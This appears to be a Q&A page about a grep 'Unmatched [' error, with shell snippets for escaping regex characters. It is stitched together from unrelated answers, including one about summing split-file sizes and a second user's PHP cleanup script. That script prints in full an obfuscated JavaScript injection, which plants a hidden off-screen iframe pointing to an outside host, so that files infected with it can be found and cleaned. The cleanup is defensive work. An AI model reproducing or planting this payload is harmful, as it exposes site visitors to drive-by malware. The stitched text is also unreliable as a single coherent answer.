“grep: Unmatched [” error when using regex

grep, quoting, regular expression

I'm trying to find a pattern similar to this:

tail -n 100000 gateway.log | grep -B10 -A10 'Nov 22 11:13:56 Received Packet from [10.50.98.68'

Where "11:13:56" could be any time.

This is what I came up with:

tail -n 100000 gateway.log | grep -B10 -A10 'Nov 22 [0-9]:[0-9]:[0-9] Received Packet from [10.50.98.68'

I'm not sure what it is referring to when it says "unmatched [". This part "[0-9]:[0-9]:[0-9]" is supposed to be regex. This part "[10.50.98.68" is supposed to be a string.

Best Answer

In a grep regular expression, [ is a special character. For a literal [, you need to backslash escape it, like so: \[.

Note that the entirety of Nov 22 [0-9]: ... [10.50.98.68 is a regular expression. You can't just point to it and say "this part is a regex, this part should be a literal string" and expect grep to be able to read your thoughts. That's why you need to escape any special characters that are part of literal strings you want to match.

Unrelated, but each occurrence of [0-9] in your regular expression only matches a single character. Also, . is a special character that will need to be escaped as well. You probably want something like the following for your regular expression:

^Nov 22 [0-9][0-9]:[0-9][0-9]:[0-9][0-9] Received Packet from \[10\.50\.98\.68
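To see the escaped pattern at work, here is a minimal sketch. The three sample lines are made up for illustration and stand in for gateway.log; only the first one should match.

```shell
# Hypothetical sample lines standing in for gateway.log
sample_log='Nov 22 11:13:56 Received Packet from [10.50.98.68]
Nov 22 11:13:57 Received Packet from [10.50.98.69]
Nov 22 11:14:02 Sent Packet to [10.50.98.68]'

# The literal [ and . are backslash-escaped; the time uses two digits per field
pattern='^Nov 22 [0-9][0-9]:[0-9][0-9]:[0-9][0-9] Received Packet from \[10\.50\.98\.68'

matches=$(printf '%s\n' "$sample_log" | grep "$pattern")
printf '%s\n' "$matches"
```

The single quotes keep the shell from touching the backslashes, so grep receives the pattern exactly as written.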

How to quote special characters (portably)

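The following snippet adds a backslash before each character that's special in extended regular expressions, using sed to replace any occurrence of one of the characters ][()\.^$?*+ by a backslash followed by that character. (The characters { and | are also special in extended regular expressions; add them to the bracket expression if your strings can contain them.)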

raw_string='test[string]\.wibble'
quoted_string=$(printf %s "$raw_string" | sed 's/[][()\.^$?*+]/\\&/g')

This will remove trailing newlines in $raw_string; if that's a problem, ensure that the string doesn't end with a newline by adding an inert character at the end, then strip off that character.

quoted_string=$(printf %sa "$raw_string" | sed 's/[][()\.^$?*+]/\\&/g')
quoted_string=${quoted_string%?}
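As a quick check of the sed approach, the sketch below quotes the sample string and then uses the result as a pattern for grep -E. The two input lines are invented for the example, and it assumes a grep that treats \] as a literal ] (GNU and BSD grep both do).

```shell
raw_string='test[string]\.wibble'
quoted_string=$(printf %s "$raw_string" | sed 's/[][()\.^$?*+]/\\&/g')
printf '%s\n' "$quoted_string"

# Only the first line contains the raw string literally;
# the second would match if [ ] \ . were left unescaped as regex syntax
found=$(printf '%s\n' 'xx test[string]\.wibble yy' 'tests.wibble' |
  grep -E "$quoted_string")
printf '%s\n' "$found"
```

If the whole pattern is a literal string, grep -F avoids the quoting step altogether; quoting like this is useful when the literal text has to be combined with real regex parts.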

How to quote special characters (in bash or zsh)

Bash and zsh have a pattern replacement feature, which can be faster if the string is not very long. It's cumbersome here because the replacement must be a string, so each character needs to be replaced separately. Note that you must escape the backslashes first.

quoted_string=${raw_string//\\/\\\\}
for c in \[ \] \( \) \. \^ \$ \? \* \+; do
  quoted_string=${quoted_string//"$c"/"\\$c"}
done

How to quote special characters (in ksh93)

Ksh's string replacement construct is more powerful than the watered-down version in bash and zsh. It supports references to groups in the pattern.

quoted_string=${raw_string//@([][()\.^$?*+])/\\\1}

What you actually want

You don't need find here: shell patterns are sufficient to match files ending with three digits. If no part file exists, the glob pattern is left unexpanded. There's also a simpler way of adding the file sizes: rather than use stat (which exists on many unix variants but has a different syntax on each) and do complex pipelining to sum the values, you can call wc -c (on regular files, on most systems, wc will look at the file size and not bother to open the file and read the bytes).

set -- "$DESTINATION/$FILE_BASENAME".[0-9][0-9][0-9]
case $1 in
  *\]) # The glob was left intact, so no part exists
    do_split …;;
  *) # The glob was expanded, so at least one part exists
    FILE_SIZE_EXISTING=$(wc -c "$@" | sed -n '$s/[^0-9]//gp')
    if [ "$FILE_SIZE_EXISTING" -ne "$(wc -c <"$DESTINATION/$FILE_BASENAME")" ]; then
      do_split …
    fi;;
esac

Note that your test on the total size is not very reliable: if the file has changed but remained the same size, you'll end up with stale parts. That's ok if the files never change and the only risk is that parts may be truncated or missing.
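The glob-detection idiom can be tried in isolation. This is only a sketch: the scratch directory and the data.000/data.001 part files are hypothetical, and it assumes a POSIX sh or bash with default globbing options (no nullglob or failglob).

```shell
# Hypothetical scratch directory and part files, for illustration only
tmpdir=$(mktemp -d)
printf 'abc' >"$tmpdir/data.000"
printf 'de'  >"$tmpdir/data.001"

# Case 1: parts exist, so the glob expands to the matching files
set -- "$tmpdir/data".[0-9][0-9][0-9]
case $1 in
  *\]) parts_found=no;;
  *)   parts_found=yes;;
esac
part_count=$#
# With more than one file, the last line of wc -c output is the total
total=$(wc -c "$@" | awk 'END {print $1}')

# Case 2: no parts exist, so the pattern is passed through unchanged
set -- "$tmpdir/missing".[0-9][0-9][0-9]
case $1 in
  *\]) missing_found=no;;
  *)   missing_found=yes;;
esac

rm -rf "$tmpdir"
printf '%s %s %s %s\n' "$parts_found" "$part_count" "$total" "$missing_found"
```

Here the total is taken from the first field of the last line with awk rather than by stripping non-digits, which sidesteps digits in a file name when only one part exists.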

Bash – Problems with regex in grep

Since I'm more familiar with php, I ended up with this:

#! /opt/php56/bin/php
<?php

$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = preg_replace("/(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)/", '', $filecontents);      
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("grep count: $count") . PHP_EOL;

I think the grep part could be simplified too. Because fgrep matches fixed strings rather than regular expressions, and grep works line by line, searching for the marker comment alone should be enough to list the affected files, something like this:

fgrep -rl '/*236499a9e0b11c0dc3eecf5cf751a097*/' .

But I didn't try it, so I don't know for sure.
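The marker comment contains * characters, which is why the script searches with -F. A minimal sketch of the difference, using a made-up input line:

```shell
marker='/*236499a9e0b11c0dc3eecf5cf751a097*/'
line="<script>$marker var x = 1;"

# As a regular expression, "/*" means "zero or more slashes" and "7*" means
# "zero or more 7s", so the pattern does not match the literal marker text.
regex_hits=$(printf '%s\n' "$line" | grep -c "$marker" || true)

# With -F the pattern is a fixed string and matches the marker as written.
fixed_hits=$(printf '%s\n' "$line" | grep -cF "$marker" || true)

printf 'regex: %s, fixed: %s\n' "$regex_hits" "$fixed_hits"
```

The `|| true` is there only because grep exits with status 1 when nothing matches.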

A better way to recover from this kind of malware would be to use a backup, but in my case this wasn't possible, so I opted for the search/replace strategy.

Thanks for all the help !!
